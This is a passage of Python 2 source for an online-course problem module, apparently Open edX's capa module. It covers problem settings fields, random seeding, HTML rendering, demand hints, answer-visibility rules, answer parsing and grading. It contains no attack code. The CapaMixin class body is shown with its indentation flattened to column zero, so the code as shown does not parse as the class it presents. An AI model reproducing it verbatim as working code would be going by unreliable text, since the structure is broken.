        """Map legacy boolean-ish strings onto the RANDOMIZATION constants."""
        if value in ("", "true"):
            return RANDOMIZATION.ALWAYS
        if value == "false":
            return RANDOMIZATION.PER_STUDENT
        return value

    # Serialization applies the same legacy mapping in both directions.
    to_json = from_json
class ComplexEncoder(json.JSONEncoder):
    """
    JSON encoder that additionally understands Python complex numbers.
    """
    def default(self, obj):
        """
        Render a complex number as '<real><+/-imag>*j'; defer everything
        else to the stock JSONEncoder (which raises TypeError).
        """
        if not isinstance(obj, complex):
            return json.JSONEncoder.default(self, obj)
        return u"{real:.7g}{imag:+.7g}*j".format(real=obj.real, imag=obj.imag)
class CapaFields(object):
    """
    Define the possible fields for a Capa problem
    """
    # --- authoring/settings-scope fields -----------------------------------
    display_name = String(
        display_name=_("Display Name"),
        help=_("This name appears in the horizontal navigation at the top of the page."),
        scope=Scope.settings,
        # it'd be nice to have a useful default but it screws up other things; so,
        # use display_name_with_default for those
        default=_("Blank Advanced Problem")
    )
    attempts = Integer(
        help=_("Number of attempts taken by the student on this problem"),
        default=0,
        scope=Scope.user_state)
    max_attempts = Integer(
        display_name=_("Maximum Attempts"),
        help=_("Defines the number of times a student can try to answer this problem. "
               "If the value is not set, infinite attempts are allowed."),
        values={"min": 0}, scope=Scope.settings
    )
    due = Date(help=_("Date that this problem is due by"), scope=Scope.settings)
    graceperiod = Timedelta(
        help=_("Amount of time after the due date that submissions will be accepted"),
        scope=Scope.settings
    )
    showanswer = String(
        display_name=_("Show Answer"),
        help=_("Defines when to show the answer to the problem. "
               "A default value can be set in Advanced Settings."),
        scope=Scope.settings,
        default=SHOWANSWER.FINISHED,
        values=[
            {"display_name": _("Always"), "value": SHOWANSWER.ALWAYS},
            {"display_name": _("Answered"), "value": SHOWANSWER.ANSWERED},
            {"display_name": _("Attempted"), "value": SHOWANSWER.ATTEMPTED},
            {"display_name": _("Closed"), "value": SHOWANSWER.CLOSED},
            {"display_name": _("Finished"), "value": SHOWANSWER.FINISHED},
            {"display_name": _("Correct or Past Due"), "value": SHOWANSWER.CORRECT_OR_PAST_DUE},
            {"display_name": _("Past Due"), "value": SHOWANSWER.PAST_DUE},
            {"display_name": _("Never"), "value": SHOWANSWER.NEVER}]
    )
    force_save_button = Boolean(
        help=_("Whether to force the save button to appear on the page"),
        scope=Scope.settings,
        default=False
    )
    # The platform-wide default for show_reset_button is read from Django
    # settings at class-definition time (falls back to False when unset).
    reset_key = "DEFAULT_SHOW_RESET_BUTTON"
    default_reset_button = getattr(settings, reset_key) if hasattr(settings, reset_key) else False
    show_reset_button = Boolean(
        display_name=_("Show Reset Button"),
        help=_("Determines whether a 'Reset' button is shown so the user may reset their answer. "
               "A default value can be set in Advanced Settings."),
        scope=Scope.settings,
        default=default_reset_button
    )
    rerandomize = Randomization(
        display_name=_("Randomization"),
        help=_(
            'Defines when to randomize the variables specified in the associated Python script. '
            'For problems that do not randomize values, specify \"Never\". '
        ),
        default=RANDOMIZATION.NEVER,
        scope=Scope.settings,
        values=[
            {"display_name": _("Always"), "value": RANDOMIZATION.ALWAYS},
            {"display_name": _("On Reset"), "value": RANDOMIZATION.ONRESET},
            {"display_name": _("Never"), "value": RANDOMIZATION.NEVER},
            {"display_name": _("Per Student"), "value": RANDOMIZATION.PER_STUDENT}
        ]
    )
    data = String(help=_("XML data for the problem"), scope=Scope.content, default="<problem></problem>")
    # --- per-user state fields ---------------------------------------------
    correct_map = Dict(help=_("Dictionary with the correctness of current student answers"),
                       scope=Scope.user_state, default={})
    input_state = Dict(help=_("Dictionary for maintaining the state of inputtypes"), scope=Scope.user_state)
    student_answers = Dict(help=_("Dictionary with the current student responses"), scope=Scope.user_state)
    done = Boolean(help=_("Whether the student has answered the problem"), scope=Scope.user_state)
    seed = Integer(help=_("Random seed for this student"), scope=Scope.user_state)
    last_submission_time = Date(help=_("Last submission time"), scope=Scope.user_state)
    submission_wait_seconds = Integer(
        display_name=_("Timer Between Attempts"),
        help=_("Seconds a student must wait between submissions for a problem with multiple attempts."),
        scope=Scope.settings,
        default=0)
    weight = Float(
        display_name=_("Problem Weight"),
        help=_("Defines the number of points each problem is worth. "
               "If the value is not set, each response field in the problem is worth one point."),
        values={"min": 0, "step": .1},
        scope=Scope.settings
    )
    markdown = String(help=_("Markdown source of this module"), default=None, scope=Scope.settings)
    source_code = String(
        help=_("Source code for LaTeX and Word problems. This feature is not well-supported."),
        scope=Scope.settings
    )
    text_customization = Dict(
        help=_("String customization substitutions for particular locations"),
        scope=Scope.settings
        # TODO: someday it should be possible to not duplicate this definition here
        # and in inheritance.py
    )
    use_latex_compiler = Boolean(
        help=_("Enable LaTeX templates?"),
        default=False,
        scope=Scope.settings
    )
    matlab_api_key = String(
        display_name=_("Matlab API key"),
        help=_("Enter the API key provided by MathWorks for accessing the MATLAB Hosted Service. "
               "This key is granted for exclusive use by this course for the specified duration. "
               "Please do not share the API key with other courses and notify MathWorks immediately "
               "if you believe the key is exposed or compromised. To obtain a key for your course, "
               "or to report an issue, please contact moocsupport@mathworks.com"),
        scope=Scope.settings
    )
class CapaMixin(CapaFields):
"""
Core logic for Capa Problem, which can be used by XModules or XBlocks.
"""
def __init__(self, *args, **kwargs):
    """Build the LoncapaProblem for this module and sync its state back.

    On failure, either renders a dummy error problem (DEBUG) or re-raises
    with added context.
    """
    super(CapaMixin, self).__init__(*args, **kwargs)

    due_date = self.due

    # The effective close date is the due date extended by any grace period.
    if self.graceperiod is not None and due_date:
        self.close_date = due_date + self.graceperiod
    else:
        self.close_date = due_date

    if self.seed is None:
        self.choose_new_seed()

    # Need the problem location in openendedresponse to send out. Adding
    # it to the system here seems like the least clunky way to get it
    # there.
    self.runtime.set('location', self.location.to_deprecated_string())

    try:
        # TODO (vshnayder): move as much as possible of this work and error
        # checking to descriptor load time
        self.lcp = self.new_lcp(self.get_state_for_lcp())

        # At this point, we need to persist the randomization seed
        # so that when the problem is re-loaded (to check/view/save)
        # it stays the same.
        # However, we do not want to write to the database
        # every time the module is loaded.
        # So we set the seed ONLY when there is not one set already
        if self.seed is None:
            self.seed = self.lcp.seed

    except Exception as err:  # pylint: disable=broad-except
        msg = u'cannot create LoncapaProblem {loc}: {err}'.format(
            loc=self.location.to_deprecated_string(), err=err)
        # TODO (vshnayder): do modules need error handlers too?
        # We shouldn't be switching on DEBUG.
        if self.runtime.DEBUG:
            log.warning(msg)
            # TODO (vshnayder): This logic should be general, not here--and may
            # want to preserve the data instead of replacing it.
            # e.g. in the CMS
            msg = u'<p>{msg}</p>'.format(msg=cgi.escape(msg))
            msg += u'<p><pre>{tb}</pre></p>'.format(
                # just the traceback, no message - it is already present above
                tb=cgi.escape(
                    u''.join(
                        ['Traceback (most recent call last):\n'] +
                        traceback.format_tb(sys.exc_info()[2])
                    )
                )
            )
            # create a dummy problem with error message instead of failing
            problem_text = (u'<problem><text><span class="inline-error">'
                            u'Problem {url} has an error:</span>{msg}</text></problem>'.format(
                                url=self.location.to_deprecated_string(),
                                msg=msg)
                            )
            self.lcp = self.new_lcp(self.get_state_for_lcp(), text=problem_text)
        else:
            # add extra info and raise
            # NOTE: Python 2-only raise syntax, preserves the original traceback.
            raise Exception(msg), None, sys.exc_info()[2]

    self.set_state_from_lcp()

    assert self.seed is not None
def choose_new_seed(self):
    """
    Pick a fresh seed for this student according to the rerandomize policy.
    """
    if self.rerandomize == RANDOMIZATION.NEVER:
        self.seed = 1
        return
    if self.rerandomize == RANDOMIZATION.PER_STUDENT and hasattr(self.runtime, 'seed'):
        # see comment on randomization_bin
        self.seed = randomization_bin(self.runtime.seed, unicode(self.location).encode('utf-8'))
        return
    # Fully random seed, but capped so that sandboxed code execution can be
    # cached while still leaving an interesting number of possibilities.
    raw_seed = struct.unpack('i', os.urandom(4))[0]
    self.seed = raw_seed % MAX_RANDOMIZATION_BINS
def new_lcp(self, state, text=None):
    """
    Generate a new LoncapaProblem from `text` (defaults to self.data) and `state`.
    """
    problem_text = self.data if text is None else text

    capa_system = LoncapaSystem(
        ajax_url=self.runtime.ajax_url,
        anonymous_student_id=self.runtime.anonymous_student_id,
        cache=self.runtime.cache,
        can_execute_unsafe_code=self.runtime.can_execute_unsafe_code,
        get_python_lib_zip=self.runtime.get_python_lib_zip,
        DEBUG=self.runtime.DEBUG,
        filestore=self.runtime.filestore,
        i18n=self.runtime.service(self, "i18n"),
        node_path=self.runtime.node_path,
        render_template=self.runtime.render_template,
        seed=self.runtime.seed,  # Why do we do this if we have self.seed?
        STATIC_URL=self.runtime.STATIC_URL,
        xqueue=self.runtime.xqueue,
        matlab_api_key=self.matlab_api_key
    )

    return LoncapaProblem(
        problem_text=problem_text,
        id=self.location.html_id(),
        state=state,
        seed=self.seed,
        capa_system=capa_system,
        capa_module=self,  # njp
    )
def get_state_for_lcp(self):
    """
    Return a dictionary snapshot of the module state consumed by LoncapaProblem.
    """
    state = {
        'done': self.done,
        'correct_map': self.correct_map,
        'student_answers': self.student_answers,
        'input_state': self.input_state,
        'seed': self.seed,
    }
    return state
def set_state_from_lcp(self):
    """
    Copy the state held by `self.lcp` back onto this module's fields.
    """
    lcp_state = self.lcp.get_state()
    self.done = lcp_state['done']
    self.correct_map = lcp_state['correct_map']
    self.input_state = lcp_state['input_state']
    self.student_answers = lcp_state['student_answers']
    self.seed = lcp_state['seed']
def set_last_submission_time(self):
    """
    Record the current UTC time as the moment the problem was last
    checked; read later by the submission rate-limiting logic.
    """
    self.last_submission_time = datetime.datetime.now(UTC())
def get_score(self):
    """
    Access the problem's score.

    Returns the LoncapaProblem score dict, with 'score' and 'total' keys.
    """
    return self.lcp.get_score()
def max_score(self):
    """
    Access the problem's max score, as reported by the underlying
    LoncapaProblem.
    """
    return self.lcp.get_max_score()
def get_progress(self):
    """
    Report progress as score/total, scaled by weight when one is set.

    Returns None when total is 0, when weight is 0, or when Progress
    rejects the values.
    """
    score_dict = self.get_score()
    raw_score = score_dict['score']
    raw_total = score_dict['total']
    if raw_total <= 0:
        return None
    if self.weight is not None:
        if self.weight == 0:
            # A zero weight would give Progress a zero denominator.
            return None
        # Rescale so the denominator equals the configured weight.
        raw_score = raw_score * self.weight / raw_total
        raw_total = self.weight
    try:
        return Progress(raw_score, raw_total)
    except (TypeError, ValueError):
        log.exception("Got bad progress")
        return None
def get_html(self):
    """
    Render the ajax-loading wrapper template with metadata about this
    module (element id, ajax url, and current progress strings).
    """
    progress = self.get_progress()
    context = {
        'element_id': self.location.html_id(),
        'id': self.location.to_deprecated_string(),
        'ajax_url': self.runtime.ajax_url,
        'progress_status': Progress.to_js_status_str(progress),
        'progress_detail': Progress.to_js_detail_str(progress),
    }
    return self.runtime.render_template('problem_ajax.html', context)
def check_button_name(self):
    """
    Return the label for the "check" button.

    Normally "Check"; on the student's final allowed attempt it becomes
    "Final Check". Both labels can be overridden via text_customization.
    """
    # The _('xxx') literals below are spelled out so translation tooling
    # can discover them; each string is passed through _() exactly once.
    _ = self.runtime.service(self, "i18n").ugettext
    labels = {
        'normal': _('Check'),
        'final': _('Final Check'),
    }

    # Apply customizations if present
    if 'custom_check' in self.text_customization:
        labels['normal'] = _(self.text_customization.get('custom_check'))  # pylint: disable=translation-of-non-string
    if 'custom_final_check' in self.text_customization:
        labels['final'] = _(self.text_customization.get('custom_final_check'))  # pylint: disable=translation-of-non-string
    # TODO: need a way to get the customized words into the list of
    # words to be translated

    on_last_attempt = (
        self.max_attempts is not None and self.attempts >= self.max_attempts - 1
    )
    return labels['final'] if on_last_attempt else labels['normal']
def check_button_checking_name(self):
    """
    Return the transient "checking..." label briefly shown on the check
    button while waiting for the server's response.

    Can be overridden through the text_customization setting.
    """
    if 'custom_checking' in self.text_customization:
        return self.text_customization['custom_checking']
    _ = self.runtime.service(self, "i18n").ugettext
    return _('Checking...')
def should_show_check_button(self):
    """
    Decide whether the "Check" button should be rendered.

    Hidden when the problem is closed (past due / out of attempts) or
    when a rerandomized problem is awaiting a reset after submission.
    """
    awaiting_reset = (
        self.is_submitted() and self.rerandomize == RANDOMIZATION.ALWAYS
    )
    return not (self.closed() or awaiting_reset)
def should_show_reset_button(self):
    """
    Decide whether the "Reset" button should be rendered.

    Closed problems hide the button unless they are survey questions
    (max_attempts == 0). Submitted randomized problems always show it;
    otherwise it is hidden for fully-correct answers and falls back to
    the show_reset_button setting.
    """
    is_survey_question = (self.max_attempts == 0)
    if self.closed() and not is_survey_question:
        return False
    randomized = self.rerandomize in [RANDOMIZATION.ALWAYS, RANDOMIZATION.ONRESET]
    if randomized and self.is_submitted():
        return True
    if self.is_correct():
        # Do NOT show the button if the problem is correct.
        return False
    return self.show_reset_button
def should_show_save_button(self):
    """
    Return True/False to indicate whether to show the "Save" button.

    force_save_button overrides everything except the problem being
    closed; otherwise the button appears only when checking would have
    consequences (limited attempts or always-rerandomized answers).
    """
    # If the user has forced the save button to display,
    # then show it as long as the problem is not closed
    # (past due / too many attempts)
    if self.force_save_button:
        return not self.closed()
    else:
        is_survey_question = (self.max_attempts == 0)
        needs_reset = self.is_submitted() and self.rerandomize == RANDOMIZATION.ALWAYS

        # If the student has unlimited attempts, and their answers
        # are not randomized, then we do not need a save button
        # because they can use the "Check" button without consequences.
        #
        # The consequences we want to avoid are:
        # * Using up an attempt (if max_attempts is set)
        # * Changing the current problem, and no longer being
        #   able to view it (if rerandomize is "always")
        #
        # In those cases. the if statement below is false,
        # and the save button can still be displayed.
        #
        if self.max_attempts is None and self.rerandomize != RANDOMIZATION.ALWAYS:
            return False

        # If the problem is closed (and not a survey question with max_attempts==0),
        # then do NOT show the save button
        # If we're waiting for the user to reset a randomized problem
        # then do NOT show the save button
        elif (self.closed() and not is_survey_question) or needs_reset:
            return False
        else:
            return True
def handle_problem_html_error(self, err):
    """
    Create a dummy problem to represent any errors.

    Change our problem to a dummy problem containing a warning message to
    display to users. Returns the HTML to show to users.

    `err` is the Exception encountered while rendering the problem HTML.
    """
    log.exception(err.message)

    # TODO (vshnayder): another switch on DEBUG.
    if self.runtime.DEBUG:
        # Debug mode: show the raw error and traceback inline.
        msg = (
            u'[courseware.capa.capa_module] <font size="+1" color="red">'
            u'Failed to generate HTML for problem {url}</font>'.format(
                url=cgi.escape(self.location.to_deprecated_string()))
        )
        msg += u'<p>Error:</p><p><pre>{msg}</pre></p>'.format(msg=cgi.escape(err.message))
        msg += u'<p><pre>{tb}</pre></p>'.format(tb=cgi.escape(traceback.format_exc()))
        html = msg

    else:
        # We're in non-debug mode, and possibly even in production. We want
        # to avoid bricking of problem as much as possible

        # Presumably, student submission has corrupted LoncapaProblem HTML.
        # First, pull down all student answers
        student_answers = self.lcp.student_answers
        answer_ids = student_answers.keys()

        # Some inputtypes, such as dynamath, have additional "hidden" state that
        # is not exposed to the student. Keep those hidden
        # TODO: Use regex, e.g. 'dynamath' is suffix at end of answer_id
        # NOTE(review): popping inside this loop assumes Python 2, where
        # keys() returns a list snapshot -- confirm before porting to Py3.
        hidden_state_keywords = ['dynamath']
        for answer_id in answer_ids:
            for hidden_state_keyword in hidden_state_keywords:
                if answer_id.find(hidden_state_keyword) >= 0:
                    student_answers.pop(answer_id)

        # Next, generate a fresh LoncapaProblem
        self.lcp = self.new_lcp(None)
        self.set_state_from_lcp()

        # Prepend a scary warning to the student
        _ = self.runtime.service(self, "i18n").ugettext
        warning_msg = _("Warning: The problem has been reset to its initial state!")
        warning = '<div class="capa_reset"> <h2> ' + warning_msg + '</h2>'

        # Translators: Following this message, there will be a bulleted list of items.
        warning_msg = _("The problem's state was corrupted by an invalid submission. The submission consisted of:")
        warning += warning_msg + '<ul>'

        for student_answer in student_answers.values():
            if student_answer != '':
                warning += '<li>' + cgi.escape(student_answer) + '</li>'

        warning_msg = _('If this error persists, please contact the course staff.')
        warning += '</ul>' + warning_msg + '</div>'

        html = warning
        try:
            html += self.lcp.get_html()
        except Exception:  # pylint: disable=broad-except
            # Couldn't do it. Give up.
            log.exception("Unable to generate html from LoncapaProblem")
            raise
    return html
def get_demand_hint(self, hint_index):
    """
    Return the demand hint at the given index, for the hint button.

    hint_index: index of the hint to show; wrapped modulo the number of
        <demandhint>/<hint> elements defined in the problem XML.

    Returns {'success': True, 'contents': <prefixed hint html>,
    'hint_index': <the normalized index>}.  Also emits an
    'edx.problem.hint.demandhint_displayed' tracking event.
    """
    demand_hints = self.lcp.tree.xpath("//problem/demandhint/hint")
    hint_index = hint_index % len(demand_hints)

    _ = self.runtime.service(self, "i18n").ugettext  # pylint: disable=redefined-outer-name

    hint_element = demand_hints[hint_index]
    hint_text = get_inner_html_from_xpath(hint_element)
    if len(demand_hints) == 1:
        prefix = _('Hint: ')
    else:
        # Translators: e.g. "Hint 1 of 3" meaning we are showing the first of three hints.
        prefix = _('Hint ({hint_num} of {hints_count}): ').format(hint_num=hint_index + 1,
                                                                  hints_count=len(demand_hints))

    # Log this demand-hint request
    event_info = dict()
    event_info['module_id'] = self.location.to_deprecated_string()
    event_info['hint_index'] = hint_index
    event_info['hint_len'] = len(demand_hints)
    event_info['hint_text'] = hint_text
    self.runtime.track_function('edx.problem.hint.demandhint_displayed', event_info)

    # We report the index of this hint, the client works out what index to use to get the next hint
    return {
        'success': True,
        'contents': prefix + hint_text,
        'hint_index': hint_index
    }
def get_problem_html(self, encapsulate=True):
    """
    Return html for the problem.

    Adds check, reset, save, and hint buttons as necessary based on the
    problem config and state, renders 'problem.html', and applies the
    runtime's URL substitutions.

    encapsulate: if True (the default) embed the html in a problem <div>
    """
    try:
        html = self.lcp.get_html()

    # If we cannot construct the problem HTML,
    # then generate an error message instead.
    except Exception as err:  # pylint: disable=broad-except
        html = self.handle_problem_html_error(err)

    # Strip authoring-only tags that must not reach the client.
    html = self.remove_tags_from_html(html)

    # The convention is to pass the name of the check button if we want
    # to show a check button, and False otherwise This works because
    # non-empty strings evaluate to True. We use the same convention
    # for the "checking" state text.
    if self.should_show_check_button():
        check_button = self.check_button_name()
        check_button_checking = self.check_button_checking_name()
    else:
        check_button = False
        check_button_checking = False

    content = {
        'name': self.display_name_with_default,
        'html': html,
        'weight': self.weight,
    }

    # If demand hints are available, emit hint button and div.
    demand_hints = self.lcp.tree.xpath("//problem/demandhint/hint")
    demand_hint_possible = len(demand_hints) > 0

    context = {
        'problem': content,
        'id': self.location.to_deprecated_string(),
        'check_button': check_button,
        'check_button_checking': check_button_checking,
        'reset_button': self.should_show_reset_button(),
        'save_button': self.should_show_save_button(),
        'answer_available': self.answer_available(),
        'attempts_used': self.attempts,
        'attempts_allowed': self.max_attempts,
        'demand_hint_possible': demand_hint_possible
    }

    html = self.runtime.render_template('problem.html', context)

    if encapsulate:
        html = u'<div id="problem_{id}" class="problem" data-url="{ajax_url}">'.format(
            id=self.location.html_id(), ajax_url=self.runtime.ajax_url
        ) + html + "</div>"

    # Now do all the substitutions which the LMS module_render normally does, but
    # we need to do here explicitly since we can get called for our HTML via AJAX
    html = self.runtime.replace_urls(html)
    if self.runtime.replace_course_urls:
        html = self.runtime.replace_course_urls(html)

    if self.runtime.replace_jump_to_id_urls:
        html = self.runtime.replace_jump_to_id_urls(html)

    return html
def remove_tags_from_html(self, html):
    """
    Strip capa-authoring tags (e.g. <additional_answer>, <demandhint>)
    that are not meant to be part of the client html.

    Arguments:
        html (str): rendered problem html.

    Returns:
        str: html with each listed tag and its contents removed.
    """
    # Fix: 'optionhint' and 'stringequalhint' previously appeared twice in
    # this list, wasting a full regex pass each; the list is now unique.
    tags = ['demandhint', 'choicehint', 'optionhint', 'stringhint',
            'numerichint', 'correcthint', 'regexphint', 'additional_answer',
            'stringequalhint', 'compoundhint']
    for tag in tags:
        # DOTALL because some of these tags span multiple lines.
        # Note: could probably speed this up by calling sub() once with a
        # big regex vs. simply calling sub() many times as we have here.
        html = re.sub(r'<%s.*?>.*?</%s>' % (tag, tag), '', html, flags=re.DOTALL)
    return html
def hint_button(self, data):
    """
    AJAX handler for the hint button.

    Arguments:
        data (dict): must contain 'hint_index', the client's requested
            hint index (stringly typed).

    Returns:
        dict: fresh hint payload from get_demand_hint.
    """
    requested_index = int(data['hint_index'])
    return self.get_demand_hint(requested_index)
def is_past_due(self):
    """
    True when now (UTC) is later than this problem's close date, which
    already includes any grace period. False when no close date is set.
    """
    if self.close_date is None:
        return False
    return datetime.datetime.now(UTC()) > self.close_date
def closed(self):
    """
    True when the student may no longer submit: attempts are exhausted
    (when max_attempts is set) or the due date has passed.
    """
    out_of_attempts = (
        self.max_attempts is not None and self.attempts >= self.max_attempts
    )
    return out_of_attempts or self.is_past_due()
def is_submitted(self):
    """
    Used to decide to show or hide RESET or CHECK buttons.

    Means that the student submitted the problem and nothing more; the
    problem can be completely wrong. Pressing the RESET button makes
    this function return False.
    """
    # used by conditional module
    return self.lcp.done
def is_attempted(self):
    """
    Has the problem been attempted at least once?

    Used by the conditional module.
    """
    return self.attempts > 0
def is_correct(self):
    """
    True iff the student earned full points on the problem.
    """
    current = self.get_score()
    return current['score'] == current['total']
def answer_available(self):
    """
    Is the user allowed to see an answer?

    The order of these checks matters: '' and 'never' win over the staff
    override, so a problem can explicitly hide answers even from staff.
    Unrecognized showanswer values fall through to False.
    """
    if self.showanswer == '':
        return False
    elif self.showanswer == SHOWANSWER.NEVER:
        return False
    elif self.runtime.user_is_staff:
        # This is after the 'never' check because admins can see the answer
        # unless the problem explicitly prevents it
        return True
    elif self.showanswer == SHOWANSWER.ATTEMPTED:
        return self.attempts > 0
    elif self.showanswer == SHOWANSWER.ANSWERED:
        # NOTE: this is slightly different from 'attempted' -- resetting the problems
        # makes lcp.done False, but leaves attempts unchanged.
        return self.lcp.done
    elif self.showanswer == SHOWANSWER.CLOSED:
        return self.closed()
    elif self.showanswer == SHOWANSWER.FINISHED:
        return self.closed() or self.is_correct()
    elif self.showanswer == SHOWANSWER.CORRECT_OR_PAST_DUE:
        return self.is_correct() or self.is_past_due()
    elif self.showanswer == SHOWANSWER.PAST_DUE:
        return self.is_past_due()
    elif self.showanswer == SHOWANSWER.ALWAYS:
        return True
    return False
def update_score(self, data):
    """
    Deliver a grading response (e.g. from asynchronous code checking) to
    the capa problem so its score can be updated.

    `data` must contain 'queuekey' and 'xqueue_body' (a string holding
    the grader's response).

    Returns an empty dict; no ajax payload is needed.
    """
    self.lcp.update_score(data['xqueue_body'], data['queuekey'])
    self.set_state_from_lcp()
    self.publish_grade()
    return {}
def handle_ungraded_response(self, data):
    """
    Forward an ungraded XQueue response to the capa problem.

    The problem's score is NOT updated here.

    Args:
        data (dict): must contain 'queuekey' and 'xqueue_body'.

    Returns:
        dict: empty; no ajax payload is needed.
    """
    # Pass the xqueue message through to the problem, then persist
    # whatever state it changed.
    self.lcp.ungraded_response(data['xqueue_body'], data['queuekey'])
    self.set_state_from_lcp()
    return {}
def handle_input_ajax(self, data):
    """
    Route an ajax call to the particular input it targets.

    Args:
        data (dict): payload passed through to the input.

    Returns:
        dict: the input's response.
    """
    input_response = self.lcp.handle_input_ajax(data)
    # Persist any state the input may have changed.
    self.set_state_from_lcp()
    return input_response
def get_answer(self, _data):
    """
    For the "show answer" button.

    Returns the answers: {'answers' : answers}.  Answer contents are run
    through the runtime's URL substitutions so embedded links resolve.

    Raises NotFoundError when answer_available() is False.
    """
    event_info = dict()
    event_info['problem_id'] = self.location.to_deprecated_string()
    self.track_function_unmask('showanswer', event_info)
    if not self.answer_available():
        raise NotFoundError('Answer is not available')
    else:
        answers = self.lcp.get_question_answers()
        self.set_state_from_lcp()

    # answers (eg <solution>) may have embedded images
    #   but be careful, some problems are using non-string answer dicts
    new_answers = dict()
    for answer_id in answers:
        try:
            answer_content = self.runtime.replace_urls(answers[answer_id])
            if self.runtime.replace_jump_to_id_urls:
                answer_content = self.runtime.replace_jump_to_id_urls(answer_content)
            new_answer = {answer_id: answer_content}
        except TypeError:
            # Non-string answer values can't take URL substitution;
            # fall back to the raw answer.
            log.debug(u'Unable to perform URL substitution on answers[%s]: %s',
                      answer_id, answers[answer_id])
            new_answer = {answer_id: answers[answer_id]}
        new_answers.update(new_answer)

    return {'answers': new_answers}
# Figure out if we should move these to capa_problem?
def get_problem(self, _data):
    """
    Return results of get_problem_html, as a simple dict for json-ing.

        { 'html': <the-html> }

    Used if we want to reconfirm we have the right thing e.g. after
    several AJAX calls.
    """
    return {'html': self.get_problem_html(encapsulate=False)}
@staticmethod
def make_dict_of_responses(data):
    """
    Make dictionary of student responses (aka "answers")

    `data` is POST dictionary (webob.multidict.MultiDict).

    Keys of the form 'x_y' map to key 'y' in the result; e.g.
    'input_1_2_3' maps to '1_2_3'.

    Keys ending in '[]' always produce list values (e.g. checkbox
    inputs): {'input_1[]': 'test'} -> {'1': ['test']}.

    Keys ending in '{}' are treated as json-encoded dicts and
    deserialized: {'input_1{}': '{"1_2_1": 1}'} -> {'1': {"1_2_1": 1}}.

    Raises ValueError if a key contains no underscore, if two keys
    collide after mapping (e.g. 'input_1' and 'input_1[]'), or if a
    '{}' value is not valid json.
    """
    answers = {}

    # A MultiDict yields a multi-valued key once per value; set() makes
    # each key considered a single time.
    for raw_key in set(data.keys()):
        # e.g. input_resistor_1 ==> resistor_1
        _, _, name = raw_key.partition('_')  # pylint: disable=redefined-outer-name

        # partition returns (raw_key, '', '') when no underscore exists.
        if not name:
            raise ValueError(u"{key} must contain at least one underscore".format(key=raw_key))

        # '[]' suffix => list-valued answer; '{}' suffix => dict-valued.
        wants_list = name.endswith('[]')
        wants_dict = name.endswith('{}')
        if wants_list or wants_dict:
            name = name[:-2]

        if wants_list:
            val = data.getall(raw_key)
        elif wants_dict:
            try:
                val = json.loads(data[raw_key])
            # If the submission wasn't deserializable, raise an error.
            except (KeyError, ValueError):
                raise ValueError(
                    u"Invalid submission: {val} for {key}".format(val=data[raw_key], key=raw_key)
                )
        else:
            val = data[raw_key]

        # Never silently override an existing answer.
        if name in answers:
            raise ValueError(u"Key {name} already exists in answers dict".format(name=name))
        answers[name] = val

    return answers
def publish_grade(self):
    """
    Publish the student's current grade to the runtime as a 'grade' event.

    Returns:
        dict: {'grade': <score>, 'max_grade': <total>}
    """
    current = self.lcp.get_score()
    event = {
        'value': current['score'],
        'max_value': current['total'],
    }
    self.runtime.publish(self, 'grade', event)
    return {'grade': current['score'], 'max_grade': current['total']}
# pylint: disable=too-many-statements
def check_problem(self, data, override_time=False):
    """
    Checks whether answers to a problem are correct

    Arguments:
        data: POST dict of student answers (see make_dict_of_responses).
        override_time: if not False, a datetime used instead of "now"
            for the rate-limiting checks (useful in tests).

    Returns a map of correct/incorrect answers:
      {'success' : 'correct' | 'incorrect' | AJAX alert msg string,
       'contents' : html}

    Raises NotFoundError when the problem is closed, or when a
    rerandomized problem must be reset before re-checking.
    """
    event_info = dict()
    event_info['state'] = self.lcp.get_state()
    event_info['problem_id'] = self.location.to_deprecated_string()

    answers = self.make_dict_of_responses(data)
    answers_without_files = convert_files_to_filenames(answers)
    event_info['answers'] = answers_without_files

    metric_name = u'capa.check_problem.{}'.format
    # Can override current time
    current_time = datetime.datetime.now(UTC())
    if override_time is not False:
        current_time = override_time

    _ = self.runtime.service(self, "i18n").ugettext

    # Too late. Cannot submit
    if self.closed():
        event_info['failure'] = 'closed'
        self.track_function_unmask('problem_check_fail', event_info)
        if dog_stats_api:
            dog_stats_api.increment(metric_name('checks'), tags=[u'result:failed', u'failure:closed'])
        raise NotFoundError(_("Problem is closed."))

    # Problem submitted. Student should reset before checking again
    if self.done and self.rerandomize == RANDOMIZATION.ALWAYS:
        event_info['failure'] = 'unreset'
        self.track_function_unmask('problem_check_fail', event_info)
        if dog_stats_api:
            dog_stats_api.increment(metric_name('checks'), tags=[u'result:failed', u'failure:unreset'])
        raise NotFoundError(_("Problem must be reset before it can be checked again."))

    # Problem queued. Students must wait a specified waittime before they are allowed to submit
    # IDEA: consider stealing code from below: pretty-print of seconds, cueing of time remaining
    if self.lcp.is_queued():
        prev_submit_time = self.lcp.get_recentmost_queuetime()
        waittime_between_requests = self.runtime.xqueue['waittime']
        if (current_time - prev_submit_time).total_seconds() < waittime_between_requests:
            msg = _(u"You must wait at least {wait} seconds between submissions.").format(
                wait=waittime_between_requests)
            return {'success': msg, 'html': ''}

    # Wait time between resets: check if is too soon for submission.
    if self.last_submission_time is not None and self.submission_wait_seconds != 0:
        if (current_time - self.last_submission_time).total_seconds() < self.submission_wait_seconds:
            remaining_secs = int(self.submission_wait_seconds - (current_time - self.last_submission_time).total_seconds())
            msg = _(u'You must wait at least {wait_secs} between submissions. {remaining_secs} remaining.').format(
                wait_secs=self.pretty_print_seconds(self.submission_wait_seconds),
                remaining_secs=self.pretty_print_seconds(remaining_secs))
            return {
                'success': msg,
                'html': ''
            }

    try:
        # Grade, then persist state and bump the attempt counter.
        correct_map = self.lcp.grade_answers(answers)
        self.attempts = self.attempts + 1
        self.lcp.done = True
        self.set_state_from_lcp()
        self.set_last_submission_time()

    except (StudentInputError, ResponseError, LoncapaProblemError) as inst:
        log.warning("StudentInputError in capa_module:problem_check",
                    exc_info=True)

        # Save the user's state before failing
        self.set_state_from_lcp()

        # If the user is a staff member, include
        # the full exception, including traceback,
        # in the response
        if self.runtime.user_is_staff:
            msg = u"Staff debug info: {tb}".format(tb=cgi.escape(traceback.format_exc()))

        # Otherwise, display just an error message,
        # without a stack trace
        else:
            # Translators: {msg} will be replaced with a problem's error message.
            msg = _(u"Error: {msg}").format(msg=inst.message)

        return {'success': msg}

    except Exception as err:
        # Save the user's state before failing
        self.set_state_from_lcp()

        if self.runtime.DEBUG:
            msg = u"Error checking problem: {}".format(err.message)
            msg += u'\nTraceback:\n{}'.format(traceback.format_exc())
            return {'success': msg}
        raise

    published_grade = self.publish_grade()

    # success = correct if ALL questions in this problem are correct
    success = 'correct'
    for answer_id in correct_map:
